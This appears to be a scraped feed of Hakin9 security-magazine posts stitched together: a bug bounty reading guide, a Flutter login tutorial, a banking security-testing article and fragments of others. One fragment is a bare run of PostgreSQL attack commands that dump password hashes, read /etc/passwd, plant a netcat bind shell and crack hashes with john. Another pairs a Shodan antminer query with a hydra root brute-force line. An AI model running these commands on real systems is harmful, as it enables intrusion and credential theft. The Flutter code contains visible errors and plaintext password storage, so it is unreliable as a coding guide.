• The Web Application Hacker’s Handbook – This is your new Bible. Sleep with it under your pillow.
• Web Hacking 101 by Peter Yaworski – This is your new Book of Prayers. So Pete, on his journey decided to write a book while he learned bug bounty hunting. This book goes over real live examples of bugs found and reported. Not to mention he updates it continually. We aren’t done with Peter. More on him and his awesomeness to the bug bounty community will come later.
• OWASP Testing Guide – This is the net standard from the awesome OWASP community. Think of OWASP as the bug-hunters union, sort of. Official security documentation. I have to include the docs right? ;)
• Breaking into Information Security by Andy Gill – Bug Hunting falls under Web Security/WebApp Security. These are really just a couple sub-specialties in Info Sec. Andy Gill offers a great intro into this world. I received this book because he offered it free over the holidays, so on top of the great book he is a great guy to boot!
• Mastering Modern Web Penetration Testing – And this book concludes the required reading for a new bounty hunter. Master the techniques in these books and you will be well on your way. This list is in no means everything there is but is all a new bug hunter needs.

Textbooks now covered, let’s move on to the lectures and the labs shall we? Again, this is not meant to be all inclusive, just what I think a new bounty hunter needs to know.

One of the things I’ve found awesome is the bug hunting community itself and I’m sure you will find the same thing as well. Everyone is super helpful and lead by example. For instance, two main platforms for bug bounties are HackerOne and BugCrowd. It’s only natural that they have the best content for learning the craft.

HackerOne’s: Hacker101 Course
This is hot of the press and quite simply amazing! It also shows that their finger is on the pulse, so to speak, in educating new hunters. But developers will also benefit with the mitigation section of each video detailing how to secure your code and apps! After watching the videos there are labs below them where you can practice your new found skills. Thanks for this one HackerOne!!

• *Update** HackerOne has done away with the labs and has now included a CTF! Not only can you practice your webapp skills but you get private invites for flags! Excellent combo for their Hacker101 curriculum. Way to go HackerOne!!
• https://ctf.hacker101.com/

Bugcrowd also has some amazing hacker wizards who also try to help you learn the craft.
How to Shot Web: This is Jason Haddix (@jhaddix) seminal DEFCON speech talking about how to get into the bug bounty game.
Bug Bounty Hunting Methodology v2: This is the follow up to Jason’s above talk. Watch them together and feel your brain growing.

• *Update** Not to be left behind, and being firm believers in educating the bug hunting crowd, BugCrowd also has a come out with BugCrowd University. Another great resource to really help you level up and learn bug bounty basics. https://www.youtube.com/playlist?list=PLIK9nm3mu-S4K4jMHwtplbrE1JMg0jyN-

That’s about as college block-styled as you get with those lectures and material. There is enough information here to learn the basics to finding bugs in the wild.

**Labs**

There are now a few excellent resources for practicing these newly learned ninja webapp hacking skills that are by now, exploding from your brain. I used to recommend setting up your own virtual lab and testing that way. And while it is an excellent way to learn these things. It’s not the only way now. With tech advances in web technology specifically you can find excellent labs to practice webapp pentesting. In particular I think these 2 are the best currently.

I am a Pentesterlabs Pro member as it was recommended to me multiple times by internet hacking mates I talk to. It was the best decision ever for me personally, to really help take my learning and skills to the next level. I can’t recommend Pentesterlabs Pro highly enough if webapp pentesting is what keeps you up at night. Check out the free resources they offer and I’m sure you will agree with me.

I also really highly recommend the labs at attackdefense.com Not limited to just webapps, every single lab can be run from your browser. Kali in the browser! What?!?! It’s great stuff. Go look. Now!

What about tools?
Glad you asked about that. There are two main tools that a bug hunter could use BurpSuite and OWASP Zed Attack Proxy. BurpSuite is commercial software that is quite excellent and has a huge fanbase. OWASP ZAP is open source. I’m a fan of open source software and ZAP is what I’ve been using. Both are highly extendible which will make using them alot easier. Let’s talk about that extendibility for a minute.

HUNT

Jason Haddix(@jhaddix) and the motley BugCrowd crew decided to help “pass the torch” and show new bug hunters where and how to look for bugs in the wild using Burp and Zap. The HUNT Scanner and Methodology is what they came up with. And it is amazing. I’ll let you check out the talk he did here:

HUNT and here is JP’s talk about HUNT as well. Watch them both! Well it’s also not just for Burp. @_sbzo also made it for OWASP ZAP as well. And this has been what I’ve been using. Why do I mention it? Well a new hunter isn’t going to know exactly where or how to start looking. That’s the experience that they lack coming forth. HUNT changes that by alerting on common parameters that are found with specific vulnerabilities. This was taken from actual reports by bounty hunters to BugCrowd. Cool, huh? So as you browse the site or app, you will start getting alerts about parameters that you should manually test. That’s the Scanner part.

BugCrowd HUNT Scanner putting in work on OWASP WebGoat

The methodology part is equally as neat. You can’t see it but in the above image, where you to scroll down on the bottom right of the selected Possible SQLi, HUNT tells you further resources to check about that particular vulnerabilty, like CHP 9 of Web App Hackers Handbook, which is the chapter on SQLi, and a link to a write up or two of the same vulnerability by a researcher.

These scripts IMO are absolutely required for ANYONE just starting bug hunting, for the above mentioned reasons. They will definitely help you wrap your head around what to be on the lookout for.

And that’s all I’ll recommend for tools even though there are loads more you will use as a bug hunter. Why? Because you will learn that the best bug hunters out there, often use as little tooling as possible. Manual is better, is the mantra. And how can you argue? They are the best for a reason. I mention the above because I think that this particular setup Burp/HUNT or ZAP/Hunt gives a new hunter the best chance to effectively learn the craft, initially.

And the last thing I want to touch on is to learn bug hunting, you have to read and understand others who are doing it. This means write-ups. Bugs are submitted via write-ups and these write-ups allow you to get behind the thought process of other bug hunters.

But an equally incredible resource for a new bug hunter who wants to get into a bug hunter’s mentality is listening to a hunter talk about it. Remember Peter from Earlier? This is where he comes back in. He tracks down some of the best and most elusive bug hunters in the game, just to pick their brains and share it with the community. (Didn’t I say he was awesome earlier?) You can find those talks here under his Web Hacking Pro-tips. He has offered a lot of resources to new hunters and that is extremely commendable in my opinion. Thanks Peter Y!

Remember to never stop learning. This is the most crucial thing about hacking. And be persist ant. And practice, practice, practice. There are a multitude of platforms for this but here are a few that can help. These won’t be linked (I can’t do everything for you), Google them and choose one that suits you. I was using Damned Vulnerable Web App and the WebSec Dojo in VMs at first. But i’ve since changed to using WebGoat or Buggy Web App on a local server. Yes a VM is easier, but it’s good to know how to set a server up if you want to hack, isn’t it? So pick one or two or all the ones you can find and start trying to break them.

Give yourself structure though as if in a school lab. Today is XSS day. Today I’ll just practice XSS vulns on such and such. Tomorrow is CSRF day. I’ll practice CSRF skills on yada yada. You get the idea. Don’t just go in blind and hit AUTO Scan and hope for the best. Learn the vulnerabilities. Learn the tool. Then ratchet up the security option (most have this) and try again. See why the XSS that was working earlier isn’t now and how to find one that will fire. Google is your friend. There are lists and lists for everything for days. Continually test and push yourself and you will start to learn the skills.

Where am I in my journey? I’m with you. :) I’ve only found one measly XSS bug. And I found that ordering pizza. (Funny story, I’ll blog about it soon..) So I’m definitely not an expert. There are alot of people way smarter then me who could write something like this. But because I’m walking the same journey and just starting as well I thought it might be a little easier from the perspective of a fellow newbie. There are resources galore for learning the bug hunting craft and I’d be remiss to think I could include them all. So I just included the very few I think crucial and essential.

***Update** I wanna give a big shout out to all the awesome fellas from the #BBAC Crew that put up with a noobs questions and allow me to be sponge. You guys all rock!!
As with anything in life, there can be bad as well as good, I hope you are able to filter the bad elements out when it comes to bug bounty, and focus on the positive aspects of the community.

Learn how to ask a question!! This one thing, will serve you far more then any elite hacker you may DM. ;)

Hope this helps you on your bug bounty journey.

Originally posted: https://medium.com/@Nick_Jenkins/the-hitchhikers-guide-to-bug-bounty-hunting-throughout-the-galaxy-474ddb87ae15

The post The Hitchhiker’s Guide to Bug Bounty Hunting Throughout the Galaxy. v2 by Nick Jenkins appeared first on Hakin9 - IT Security Magazine.

Flutter has hit the mobile app development world like a storm. Being an Android app and web application developer, I wanted to try this new framework to see why there’s so much buzz about it. Previously, I was very much impressed by NativeScript and React. For some strange reason, I disliked JSX and hence never used React on any of my projects.

Flutter is a cross-platform app development framework and it works on Android, iOS (and Fuschia?). The beta version of the framework was released just a few days back and Google claims to use it in production for some of its apps. One more interesting part here is that, Flutter is completely written in Dart. But worry not, Dart is very easy to learn if you’ve worked with Java and Javascript. It combines all the great features of Javascript and Java to offer an easy to use and robust modern language. But I’ll be honest, Kotlin is still my favorite modern language.

All the B.S aside, let’s get into the actual demo of building an app with Flutter. The goal of this post is to show you how to build an app with a Login screen and a simple Home screen. I choose this topic since I couldn’t find any topics explaining how to implement a Login app with SQFLite and a REST backend.Of course you can use Firebase Authentication for this, but the point is to make it easy for you to understand the ceremony involved in setting up a REST and DB client in Flutter.

Our app will have two screens:

• Login Screen (Includes text fields for username and password, and a button for login)
• Home Screen (Displays “Welcome Home”)

Firstly, I hope you have already setup Flutter in your favorite IDE. I will be using Android Studio here. If you haven’t set it up yet then please click here.

One more thing to note, I will try to follow MVP architecture here but I might be violating few guidelines so please don’t mind.

App Folder Structure

As you can see in the screenshot above, that’s how our app’s structure will be after end of this tutorial. Do not worry, I will go through each of the files in detail.

Navigation and Routes

Our app has only two screens, but we will use the Routing feature built into Flutter to navigate to login screen or home screen depending on the login state of the user.

routes.dart

import 'package:flutter/material.dart';
import 'package:login_app/screens/home/home_screen.dart';
import 'package:login_app/screens/login/login_screen.dart';

final routes = {  
  '/login':         (BuildContext context) => new LoginScreen(),  
  '/home':         (BuildContext context) => new HomeScreen(),  
  '/' :          (BuildContext context) => new LoginScreen(),
};

Adding routes are pretty simple, first you need to setup the different routes as a Map object. We only have three routes, ‘/’ is the default route.

main.dart

import 'package:flutter/material.dart';
import 'package:login_app/auth.dart';
import 'package:login_app/routes.dart';

void main() => runApp(new LoginApp());

class LoginApp extends StatelessWidget {    
   

   // This widget is the root of your application.  
   @override  
   Widget build(BuildContext context) {    
     return new MaterialApp(      
       title: 'My Login App',      
       theme: new ThemeData(        
         primarySwatch: Colors.red,      
       ),      
       routes: routes,    
      );  
    }

}

main.dart will have the entry point for our app. Nothing new happening here, we just setup MaterialApp widget as root and specify to use the routes that we just defined.

utils/network_util.dart

import 'dart:async';

import 'dart:convert';
import 'package:http/http.dart' as http;

class NetworkUtil {  
  // next three lines makes this class a Singleton  
  static NetworkUtil _instance = new NetworkUtil.internal();  
  NetworkUtil.internal();  
  factory NetworkUtil() => _instance;  

  final JsonDecoder _decoder = new JsonDecoder();  

  Future<dynamic> get(String url) {    
    return http.get(url).then((http.Response response) {      
      final String res = response.body;      
      final int statusCode = response.statusCode;      

      if (statusCode < 200 || statusCode > 400 || json == null) {        
        
        throw new Exception("Error while fetching data");      
      }      
      return _decoder.convert(res);    
    });  
  }  
  Future<dynamic> post(String url, {Map headers, body, encoding}) {    
    return http        
        .post(url, body: body, headers: headers, encoding: encoding)        
        .then((http.Response response) {      
      final String res = response.body;      
      final int statusCode = response.statusCode;      

      if (statusCode < 200 || statusCode > 400 || json == null) {        
        throw new Exception("Error while fetching data");      
      }      
      return _decoder.convert(res);    
    });  
  }
}

We need a network util class that can wrap get and post requests plus handle encoding / decoding of JSONs. Notice how get and post return Future’s, this is exactly why Dart is beautiful. Asynchrony built-in!

data/rest_ds.dart

import 'dart:async';

import 'package:login_app/utils/network_util.dart';
import 'package:login_app/models/user.dart';

class RestDatasource {  
  NetworkUtil _netUtil = new NetworkUtil();  
  static final BASE_URL = 
"http://YOUR_BACKEND_IP/login_app_backend";  
  static final LOGIN_URL = BASE_URL + "/login.php";  
  static final _API_KEY = "somerandomkey";  

  Future<User> login(String username, String password) {    
    return _netUtil.post(LOGIN_URL, body: {      
      "token": _API_KEY,      
      "username": username,      
      "password": password    
    }).then((dynamic res) {      
      print(res.toString());      
      if(res["error"]) throw new Exception(res["error_msg"]);      
      return new User.map(res["user"]);    
    });  
  }
}

RestDatasource is a data source that uses a rest backend for login_app, which I assume you already have. ‘/login’ route expects three parameters: username, password and a token key (skip this to keep things simple).

JSON response format if there’s an error:

{ error: true, error_msg: “Invalid credentitals”}

JSON response format if there’s no error:

{ error: false, user: { username: “Some username”, password: “Some password” } }

models/user.dart

class User {  
  String _username;  
  String _password;  
  User(this._usn, this._password);  

  User.map(dynamic obj) {    
    this._username = obj["username"];    
    this._password = obj["password"];  
  }  

  String get username => _username;  
  String get password => _password;  

  Map<String, dynamic> toMap() {    
    var map = new Map<String, dynamic>();    
    map["username"] = _username;    
    map["password"] = _password;    
    
    return map;  
  }
}

We use a model class to define a user. Also note, how we use a constructor to create a new User object out of a dynamic map object. I won’t get into specifics of Dart here since that’s not the point of this post.

data/database_helper.dart

import 'dart:async';
import 'dart:io' as io;

import 'package:path/path.dart';
import 'package:login_app/models/user.dart';
import 'package:sqflite/sqflite.dart';
import 'package:path_provider/path_provider.dart';

class DatabaseHelper {  
  static final DatabaseHelper _instance = new 
DatabaseHelper.internal();  
  factory DatabaseHelper() => _instance;  
 
  static Database _db;  

  Future<Database> get db async {    
    if(_db != null)      
      return _db;    
    _db = await initDb();    
    return _db;  
  }  

  DatabaseHelper.internal();  

  initDb() async {    
    io.Directory documentsDirectory = await 
getApplicationDocumentsDirectory();    
    String path = join(documentsDirectory.path, "main.db");    
    var theDb = await openDatabase(path, version: 1, onCreate: 
_onCreate);    
    return theDb;  
  }    


  void _onCreate(Database db, int version) async {    
    // When creating the db, create the table    
    await db.execute(    
    "CREATE TABLE User(id INTEGER PRIMARY KEY, username TEXT, 
password TEXT)");    
    print("Created tables");  
  }  

  Future<int> saveUser(User user) async {    
    var dbClient = await db;    
    int res = await dbClient.insert("User", user.toMap());    
    return res;  
  }  

  Future<int> deleteUsers() async {    
    var dbClient = await db;    
    int res = await dbClient.delete("User");    
    return res;  
  }  

  Future<bool> isLoggedIn() async {    
    var dbClient = await db;    
    var res = await dbClient.query("User");    
    return res.length > 0? true: false;  
  }
}

The above class uses SQFLite plugin for Flutter to handle insertion and deletion of User credentials to the database. Note: Dart has inbuilt support for factory constructor, this means you can easily create a singleton without much ceremony.

auth.dart

import 'package:login_app/data/database_helper.dart';

enum AuthState{ LOGGED_IN, LOGGED_OUT }

abstract class AuthStateListener {  
  void onAuthStateChanged(AuthState state);
}

// A naive implementation of Observer/Subscriber Pattern. Will do for now.
class AuthStateProvider {  
  static final AuthStateProvider _instance = new 
AuthStateProvider.internal();  

  List<AuthStateListener> _subscribers;  

  factory AuthStateProvider() => _instance;  
  AuthStateProvider.internal() {    
    _subscribers = new List<AuthStateListener>();    
    initState();  
  }  

  void initState() async {    
    var db = new DatabaseHelper();    
    var isLoggedIn = await db.isLoggedIn();    
    if(isLoggedIn)      
      notify(AuthState.LOGGED_IN);    
    else      
      notify(AuthState.LOGGED_OUT);  
  }  

  void subscribe(AuthStateListener listener) {    
    _subscribers.add(listener);  
  }  

  void dispose(AuthStateListener listener) {    
    for(var l in _subscribers) {      
      if(l == listener)         
         _subscribers.remove(l);    
    }  
  }  

  void notify(AuthState state) {    
    _subscribers.forEach((AuthStateListener s) => 
s.onAuthStateChanged(state));  
  }
}

auth.dart defines a Broadcaster/Observable kind of object that can notify its Subscribers of any change in AuthState (logged_in or not). You should use something like Redux to manage these kind of global states in your app. But I didn’t want to use Redux for this simple app and hence I chose to implement it manually.

screens/login/login_screen_presenter.dart

import 'package:login_app/data/rest_ds.dart';
import 'package:login_app/models/user.dart';

abstract class LoginScreenContract {  
  void onLoginSuccess(User user);  
  void onLoginError(String errorTxt);
}

class LoginScreenPresenter {  
  LoginScreenContract _view;  
  RestDatasource api = new RestDatasource();  
  LoginScreenPresenter(this._view);  

  doLogin(String username, String password) {    
    api.login(username, password).then((User user) {      
      _view.onLoginSuccess(user);    
    }).catchError((Exception error) => 
_view.onLoginError(error.toString()));  
  }
}

login_screen_presenter.dart defines an interface for LoginScreen view and a presenter that incorporates all business logic specific to login screen itself. Thanks to MVP!

We only need to handle the login logic here since we do not any other feature in LoginScreen for now.

screens/login/login_screen.dart

import 'dart:ui';

import 'package:flutter/material.dart';
import 'package:login_app/auth.dart';
import 'package:login_app/data/database_helper.dart';
import 'package:login_app/models/user.dart';
import 
'package:login_app/screens/login/login_screen_presenter.dart';

class LoginScreen extends StatefulWidget {  
  @override  
  State<StatefulWidget> createState() {    
    // TODO: implement createState    
    return new LoginScreenState();  
  }
}

class LoginScreenState extends State<LoginScreen>    
    implements LoginScreenContract, AuthStateListener {  
  BuildContext _ctx;  

  bool _isLoading = false;  
  final formKey = new GlobalKey<FormState>();  
  final scaffoldKey = new GlobalKey<ScaffoldState>();  
  String _password, _password;  

  LoginScreenPresenter _presenter;  

  LoginScreenState() {    
    _presenter = new LoginScreenPresenter(this);    
    var authStateProvider = new AuthStateProvider();    
    authStateProvider.subscribe(this);  
  }  

void _submit() {    
  final form = formKey.currentState;    

  if (form.validate()) {      
    setState(() => _isLoading = true);      
    form.save();      
    _presenter.doLogin(_username, _password);    
  }  
}  

void _showSnackBar(String text) {    
  scaffoldKey.currentState        
      .showSnackBar(new SnackBar(content: new Text(text)));  
}  

@override  
onAuthStateChanged(AuthState state) {       

  if(state == AuthState.LOGGED_IN)      
    Navigator.of(_ctx).pushReplacementNamed("/home");  
}  

@override  
Widget build(BuildContext context) {    
  _ctx = context;    
  var loginBtn = new RaisedButton(      
    onPressed: _submit,      
    child: new Text("LOGIN"),      
    color: Colors.primaries[0],    
  );    
  var loginForm = new Column(      
    children: <Widget>[        
      new Text(          
        "Login App",          
        textScaleFactor: 2.0,        
      ),        
      new Form(          
        key: formKey,          
        child: new Column(            
          children: <Widget>[              
            new Padding(                
              padding: const EdgeInsets.all(8.0),                
              child: new TextFormField(                  
                onSaved: (val) => _username = val,                  
                validator: (val) {                    
                  return val.length < 10                        
                      ? "Username must have atleast 10 chars"                        
                      : null;
                  },
                  decoration: new InputDecoration(labelText: 
"Username"),
                ),
              ),
              new Padding(
                padding: const EdgeInsets.all(8.0),
                child: new TextFormField(
                  onSaved: (val) => _password = val,
                  decoration: new InputDecoration(labelText: 
"Password"),
                ),
              ),
            ],
          ),
        ),
        _isLoading ? new CircularProgressIndicator() : loginBtn
      ],
      crossAxisAlignment: CrossAxisAlignment.center,
    );

    return new Scaffold(
      appBar: null,
      key: scaffoldKey,
      body: new Container(
        decoration: new BoxDecoration(
          image: new DecorationImage(
              image: new AssetImage("assets/login_background.jpg"),
              fit: BoxFit.cover),
        ),
        child: new Center(
          child: new ClipRect(
            child: new BackdropFilter(
              filter: new ImageFilter.blur(sigmaX: 10.0, sigmaY: 10.0),
              child: new Container(
                child: loginForm,
                height: 300.0,
                width: 300.0,
                decoration: new BoxDecoration(
                    color: Colors.grey.shade200.withOpacity(0.5)),
              ),
            ),
          ),
        ),
      ),
    );
 }  

@override  
void onLoginError(String errorTxt) {
  _showSnackBar(errorTxt);
  setState(() => _isLoading = false);  
}  

@override  
void onLoginSuccess(User user) async {    
  _showSnackBar(user.toString());    
  setState(() => _isLoading = false);    
  var db = new DatabaseHelper();    
  await db.saveUser(user);    
  var authStateProvider = new AuthStateProvider();    
  authStateProvider.notify(AuthState.LOGGED_IN);  
 }
}

There are a lot of things happening here. LoginScreen is a StatefulWidgetsince we want to store the state for entered username and password. WE define a Form widget that will make our life easier in handling form validations. May not be necessary here, but hey why not use something different!?.

I’ve also used nice fancy Backdrop effect to make things more interesting. All thanks to this stackoverflow answer.

We use a GlobalKey to manage FormState to see if the form is valid or not when the user clicks on login. Similary we need a GlobalKey for Scaffold if we want to show a Snackbar feedback after login.

LoginState implements LoginScreenContract which has methods for onLoginSuccess and onLoginError. These methods will be called by the Presenter.

LoginState also listens for any change in AuthState. So if the user logs in, LoginState will be notified of it. Here it will simply use Navigator class to replace the current route with /home.

screens/home/home_screen.dart

import 'package:flutter/material.dart';

class HomeScreen extends StatelessWidget { 
  @override 
  Widget build(BuildContext context) { 
    // TODO: implement build 
    return new Scaffold( 
      appBar: new AppBar(title: new Text("Home"),), 
      body: new Center( 
        child: new Text("Welcome home!"),
      ), 
    ); 
  }

}

Finally, edit pubspec.yaml to include the necessary plugins.

name: login_app
description: Some login app description here.

dependencies:  
  flutter:    
    sdk: flutter  

  # The following adds the Cupertino Icons font to your application.  
  # Use with the CupertinoIcons class for iOS style icons.  
  cupertino_icons: ^0.1.0  

  sqflite: ^0.7.1  
  path_provider: ^0.3.1

dev_dependencies:  
  flutter_test:    
    sdk: flutter

# For information on the generic Dart part of this file, see the
# following page: https://www.dartlang.org/tools/pub/pubspec

# The following section is specific to Flutter.
flutter:
  # The following line ensures that the Material Icons font is
  # included with your application, so that you can use the icons in
  # the material Icons class.
  uses-material-design: true

  # To add assets to your application, add an assets section, like this:
  assets:
   - assets/login_background.jpg

Note: Add your asset files to assets/ folder in the root of your project. I have used a background image for login screen. This should also be added in your pubspec.yaml file for Flutter to recognize it as an asset.

Conclusion

We’ve built a good enough login app from scratch. This should give you some insight on how to handle REST requests and create a database client. Hope you have liked this article. I’d be glad to answer any queries in comments!

Thank you!

Originally posted: https://medium.com/@kashifmin/flutter-login-app-using-rest-api-and-sqflite-b4815aed2149

The post Flutter: Login App using REST API and SQFLite by Kashif Minhaj appeared first on Hakin9 - IT Security Magazine.

The post REST: Good Practices for API Design by Jay Kapadnis, Tempus Architect appeared first on Hakin9 - IT Security Magazine.

Did you know that 1 out of 3 people opens a phishing email, and if it’s a ‘personal’ phishing mail, the numbers are even higher? The American Democrats, Sony, and users of Gmail have all been victims of phishing. It’s a problem that’s getting bigger, and the success stories of hackers are growing every day. As designer at Hike One, I felt the urge to check if my colleagues were aware of the risks of phishing, by trying to collect their passwords.

The post I Used Phishing To Get My Colleagues’ Passwords. This Is What I Did by Sebastian Conijn appeared first on Hakin9 - IT Security Magazine.

nmap -sV 192.168.100.11 -p 5432

auxiliary/scanner/postgres/postgres_version

auxiliary/scanner/postgres/postgres_login

psql -h 192.168.100.11 -U postgres

postgres-# \l
postgres-# \du
template1=# \dt
template1=# SELECT * FROM users;
postgres-# SELECT usename, passwd FROM pg_shadow;
pg_dump --host=192.168.100.11 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump

auxiliary/admin/postgres/postgres_sql
auxiliary/scanner/postgres/postgres_hashdump

postgres=# select pg_ls_dir('./');

postgres=# select pg_read_file('PG_VERSION', 0, 200);

postgres-# CREATE TABLE temp(t TEXT);
postgres-# COPY temp FROM '/etc/passwd';
postgres-# SELECT * FROM temp limit 1 offset 0;

auxiliary/admin/postgres/postgres_readfile

postgres=# CREATE TABLE pentestlab (t TEXT);
postgres=# INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
postgres=# SELECT * FROM pentestlab;
postgres=# COPY pentestlab(t) TO '/tmp/pentestlab';

chmod +x pentestlab
./pentestlab

nc -vn 192.168.100.11 2346
python -c "import pty;pty.spawn('/bin/bash')"

exploit/linux/postgres/postgres_payload

user@metasploitable:/# uname -a
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

#!/bin/bash
nc -lvvp 2345 -e /bin/bash

chmod +x /tmp/run

nc -vn 192.168.100.11 2345
python -c "import pty;pty.spawn('/bin/bash')"

john /root/Desktop/password.txt
john --show /root/Desktop/password.txt

The post A Penetration Tester’s Guide to PostgreSQL by David Hayter appeared first on Hakin9 - IT Security Magazine.

The post Five Pentesting Tools and Techniques (That Every Sysadmin Should Know) by Jeremy Trinka appeared first on Hakin9 - IT Security Magazine.

(antminer) AND protocols.raw: “80/http” AND 80.http.get.title: “401”

hydra -l root -P commonPasswords.txt -vV {TARGET} http-get /

The post Hacking Cryptocurrency Miners with OSINT Techniques by Seyfullah KILIÇ appeared first on Hakin9 - IT Security Magazine.

Security testing is a vital yet challenging task for organizations, especially financial institutions such as banks, that deal with the sensitive data of numerous individuals. That’s why they are at a higher risk of data breach and cybersecurity attack.

However, with the induction of modern banking methods, such as mobile banking, the threats are much increased because mobile applications from unknown sources and the public Wi-Fi connection make mobiles highly insecure.  

But, using mobile application enables simplified and faster banking, therefore resisting the technology could leave you far behind your competitors. So, what’s the solution?

Nothing could provide a complete guarantee against increasing cyber threats, but the recently introduced automate mobile app security testing could help you keep up the development pace along with adequate security.

What is Automate Mobile App Security Testing?

Mobile application security testing helps to assure that there isn’t any security lack in the software, which poses a privacy risk and can, cause data loss.

The automate mobile app security testing kickoff numerous attacks to an app to identify the probable security threats, compliance gaps, and vulnerabilities that could be a gateway for illegal access. With such working, the detection of security threat to private information in the mobile app is made possible.

These testing tools are a modern day facility that directly connects to the continuous integration systems. They access apps on real devices and bring accurate baseline test results when demanded.

Reasons Banks Should Adopt Automate Mobile Security App

Banking applications are among the most sensitive and complicated applications in present era software development. With the numerous financial transactions and deals every day, there is no room for vulnerability, and that’s what making organizations move towards security tools.

Also, mobile apps have opened up new ways of exploitation for hackers. Such risk is because these applications encompass most of the personal information and financial credentials necessary for banks to make transactions simpler.

However, if there are tools, methods, and successful use cases, and you neglect them, then you may be contributing to a technical loss for your organization. But are all these security tools legitimate and authentic?

Some of the automate mobile application security testing use IPsec or TLS VPN gateway for the data protection between buyer and supplier networks, and for data protection within the supplier network. VPN connection provides encryption and high-level security to data through secure tunneling process.

Therefore, it is also recommended to check the security testing application’s features once you decide to select one for your bank after reading the key reasons to consider automate mobile security app.

• Increased Cybersecurity Risks Especially For Economic Centers

Either it is a phishing attack, social engineering attack, DNS Hijacking, Ransomware or any of the cybersecurity breaches; the significant purpose behind it is to gain monetary benefit.

Getting access to the bank accounts of individuals is the best way to get financial data and to gain the utmost benefit. Therefore, a financial institution could be the favorite target of a hacker.

The security for banks and mobile apps are frequently increasing, but the hiring of an assessment or security team for this purpose is expensive and can be time consuming. Besides, an automated mobile testing app makes sure that the underlying security measures are in place, especially when there is a sudden attack, and there are no prior security measures.

• Critical Process of Security Testing

For a complex banking system, it is quite complicated to run a thorough security test from scratch. It also needs sufficient time, efficiency and resources. However, it is a critical part of an organization and requires proper consideration.

Fortunately, the security testing via automated mobile apps is gratifying when an appropriate and authentic tool is selected from among many. With the continuous integration technique, these apps allow testing even when the application is in stages of development.

• Informs You of the Corresponding Industry Security Compliances

You can fall victim to a security breach losing a significant amount of your sensitive data. However, the penalty charges for compromised customer data could hurt more.

The increased strictness over cybersecurity laws has intensified the risk and pressure on organizations especially banks. Taking the examples of countries like USA and Singapore would show how a security breach could cost millions of dollar penalty. Also, the amount could get sky high when an organization when a security audit shows the unavailability of appropriate security measures.

Here also, the automated mobile app could minimize the risk of security attack and penalty by including the top industry security compliances.

• Needs Merely Any Change To Existing Security Strategy

Most banks are averse when it comes to changing or updating their existing technology and replacing it with the most modern one. Such behavior is mainly because sufficient time and energy are required to carry out the whole process.

However, a good automate mobile app security testing tool lets you keep their solutions right on the top of the current one. You can also create your own automated tool, but it may require an ample amount of investment. Yet, the free automate mobile app could provide the appropriate security via proper expertise.

• Boost Your Marketing Pace

Last but not least, automate mobile app security testing could have a dramatic effect on the marketing time of your organization.

Because of unstopped security process during development and production, a banking team could better concentrate on core business competencies. Therefore, an app could be transferred to the app store promptly. Banks can also lead amongst the competitors as there are chances that your competitor uses a conventional security method instead of automate mobile security testing tool.

About the Author:

Zehra Ali is a Tech Reporter and Journalist with 2 years of experience in infosec industry. She writes on topics related to cybersecurity, IoT, AI, Big Data and other privacy matters on various platforms. She is also the Editor at PrivacySniffs.

The post Automate Mobile App Security Testing: Why is it Necessary for Banks to Adopt it? by Zehra Ali appeared first on Hakin9 - IT Security Magazine.